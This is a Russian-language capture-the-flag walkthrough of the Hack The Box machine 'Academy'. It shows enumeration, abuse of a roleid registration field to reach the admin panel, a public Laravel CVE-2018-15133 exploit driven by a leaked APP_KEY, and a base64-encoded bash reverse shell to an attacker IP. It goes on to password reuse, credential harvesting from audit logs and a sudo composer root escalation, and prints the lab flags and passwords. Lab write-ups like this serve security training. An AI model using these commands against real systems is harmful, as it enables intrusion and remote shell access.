Обзор сервисов
Машина имеет IP-адрес 10.10.10.215. Проверим вывод nmap:
$ sudo nmap -sS -Pn -p1-65535 -v -oN 10.10.10.215 10.10.10.215
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 05:46 EDT
Initiating Parallel DNS resolution of 1 host. at 05:46
Completed Parallel DNS resolution of 1 host. at 05:46, 0.24s elapsed
Initiating SYN Stealth Scan at 05:46
Scanning 10.10.10.215 [65535 ports]
Discovered open port 80/tcp on 10.10.10.215
Discovered open port 22/tcp on 10.10.10.215
Discovered open port 33060/tcp on 10.10.10.215
Completed SYN Stealth Scan at 05:59, 745.48s elapsed (65535 total ports)
Nmap scan report for 10.10.10.215
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
33060/tcp open mysqlx
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 746.02 seconds
Raw packets sent: 68384 (3.009MB) | Rcvd: 70328 (3.226MB)
Веб-интерфейс
На вебке происходит редирект на academy.htb. Пропишем этот домен в /etc/hosts:
$ sudo nano /etc/hosts
10.10.10.215 academy.htb
Интерфейс выглядит следующим образом:
Пройдем регистрацию и залогинимся. Интерфейс выглядит так:
Обратим внимание, что приложение работает на PHP, поэтому проведем поиск файлов и каталогов с помощью gobuster:
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://academy.htb -t 20 -x php
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://academy.htb
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2023/07/29 06:04:45 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 276]
/home.php (Status: 302) [Size: 55034] [--> login.php]
/login.php (Status: 200) [Size: 2627]
/register.php (Status: 200) [Size: 3003]
/index.php (Status: 200) [Size: 2117]
/admin.php (Status: 200) [Size: 2633]
/images (Status: 301) [Size: 311] [--> http://academy.htb/images/]
/config.php (Status: 200) [Size: 0]
Если перейти в админку /admin.php, то с нашим зарегистрированным пользователем войти не получится.
Попробуем зарегистрироваться еще раз и отметим, что существует поле roleid = 0.
Зарегистрируем еще одного пользователя и сделаем roleid = 1. С этим пользователем получается войти в админку.
Из этой страницы узнаем адрес нового стенда dev-staging-01.academy.htb. Опять добавим его в /etc/hosts.
На этом стенде видим ошибку с переменные среды:
Приложение на Laravel. Так же в открытом виде есть APP_KEY:
Это значит, что мы можем использовать эксплоит https://github.com/aljavier/exploit_laravel_cve-2018-15133.
$ git clone https://github.com/aljavier/exploit_laravel_cve-2018-15133
$ cd exploit_laravel_cve-2018-15133
$ python3 -m venv env
$ source env/bin/activate
$ pip install -r requirements.txt
$ python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
Linux academy 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
Эксплоит отрабатывает. Приготовим реверс-шелл:
$ echo 'bash -i >& /dev/tcp/10.10.16.93/4242 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi45My80MjQyIDA+JjEK
# запустим netcat
$ rlwrap nc -lnvp 4242
# запустим шелл
$ python3 pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -c "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi45My80MjQyIDA+JjEK | base64 -d | bash"
Подъем до пользователя
В каталоге с сайтом обнаружили логин и пароль для mysql.
$ cd /var/www/html/academy
$ cat .env
...
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
...
Не получается зайти в mysql с этим паролем. Попробуем поискать файл с флагом.
$ cd /home
$ find . -name user.txt
find: './egre55/.cache': Permission denied
find: './cry0l1t3/.cache': Permission denied
find: './cry0l1t3/.gnupg': Permission denied
./cry0l1t3/user.txt
find: './cry0l1t3/snap/lxd/14804/.config/lxc': Permission denied
find: './cry0l1t3/.local/share': Permission denied
Попробуем воспользоваться паролем mySup3rP4s5w0rd!! для пользователя cry0l1t3.
$ ssh [email protected]
mySup3rP4s5w0rd!!
Пользовательский флаг
$ ls -l
total 12
-rw-rw-r-- 1 cry0l1t3 cry0l1t3 1561 Jul 28 08:16 README.md
drwxr-xr-x 3 cry0l1t3 cry0l1t3 4096 Jul 28 08:23 snap
-r--r----- 1 cry0l1t3 cry0l1t3 33 Jul 28 06:23 user.txt
$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3)(adm)
$ cat user.txt
10e280bef507b9aa2c7b80151aca261b
Повышение привилегий
Отметим, что пользователь cry0l1t3 состоит в группе adm, то есть мы можем читать логи в /var/log. С помощью утилиты aureport мы можем посмотреть, кто входил в TTY (https://access.redhat.com/solutions/5585231):
$ aureport --tty
TTY Report
===============================================
# date time event auid term sess comm data
===============================================
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
3. 08/12/2020 02:28:24 89 0 ? 1 sh "whoami",<nl>
4. 08/12/2020 02:28:28 90 0 ? 1 sh "exit",<nl>
5. 08/12/2020 02:28:37 93 0 ? 1 sh "/bin/bash -i",<nl>
6. 08/12/2020 02:30:43 94 0 ? 1 nano <delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>
7. 08/12/2020 02:32:13 95 0 ? 1 nano <down>,<up>,<up>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<backspace>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>
8. 08/12/2020 02:32:55 96 0 ? 1 nano "6",<^X>,"y",<ret>
9. 08/12/2020 02:33:26 97 0 ? 1 bash "ca",<up>,<up>,<up>,<backspace>,<backspace>,"cat au",<tab>,"| grep data=",<ret>,"cat au",<tab>,"| cut -f11 -d\" \"",<ret>,<up>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<right>,<right>,"grep data= | ",<ret>,<up>," > /tmp/data.txt",<ret>,"id",<ret>,"cd /tmp",<ret>,"ls",<ret>,"nano d",<tab>,<ret>,"cat d",<tab>," | xx",<tab>,"-r -p",<ret>,"ma",<backspace>,<backspace>,<backspace>,"nano d",<tab>,<ret>,"cat dat",<tab>," | xxd -r p",<ret>,<up>,<left>,"-",<ret>,"cat /var/log/au",<tab>,"t",<tab>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,"d",<tab>,"aud",<tab>,"| grep data=",<ret>,<up>,<up>,<up>,<up>,<up>,<down>,<ret>,<up>,<up>,<up>,<ret>,<up>,<up>,<up>,<ret>,"exit",<backspace>,<backspace>,<backspace>,<backspace>,"history",<ret>,"exit",<ret>
10. 08/12/2020 02:33:26 98 0 ? 1 sh "exit",<nl>
11. 08/12/2020 02:33:30 107 0 ? 1 sh "/bin/bash -i",<nl>
12. 08/12/2020 02:33:36 108 0 ? 1 bash "istory",<ret>,"history",<ret>,"exit",<ret>
13. 08/12/2020 02:33:36 109 0 ? 1 sh "exit",<nl>
Отсюда мы получаем креды mrb3n:mrb3n_Ac@d3my!.
$ ssh [email protected]
mrb3n_Ac@d3my!
mrb3n@academy:~$ id
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)
Пользователь mrb3n может выполнять /usr/bin/composer как суперпользователь.
$ sudo -l
[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mrb3n may run the following commands on academy:
(ALL) /usr/bin/composer
С помощью gtfobins поднимем привилегии:
mrb3n@academy:~$ TF=$(mktemp -d)
mrb3n@academy:~$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
mrb3n@academy:~$ sudo composer --working-dir=$TF run-script x
PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
$ id
uid=0(root) gid=0(root) groups=0(root)
Флаг суперпользователя
$ cd /root
$ ls -la
total 68
drwx------ 7 root root 4096 Feb 9 2021 .
drwxr-xr-x 20 root root 4096 Feb 10 2021 ..
-r--r----- 1 root root 1748 Nov 6 2020 academy.txt
lrwxrwxrwx 1 root root 9 Aug 10 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Aug 8 2020 .cache
drwxr-xr-x 3 root root 4096 Aug 8 2020 .composer
drwxr-xr-x 3 root root 4096 Aug 7 2020 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-r--r----- 1 root root 33 Jul 28 06:23 root.txt
-rw-r--r-- 1 root root 66 Aug 12 2020 .selected_editor
drwxr-xr-x 3 root root 4096 Aug 7 2020 snap
drwx------ 2 root root 4096 Aug 7 2020 .ssh
-rw------- 1 root root 14087 Feb 9 2021 .viminfo
-rw-r--r-- 1 root root 186 Sep 14 2020 .wget-hsts
$ cat root.txt
30cc72fe57eaa9daa5138867bf414cc1
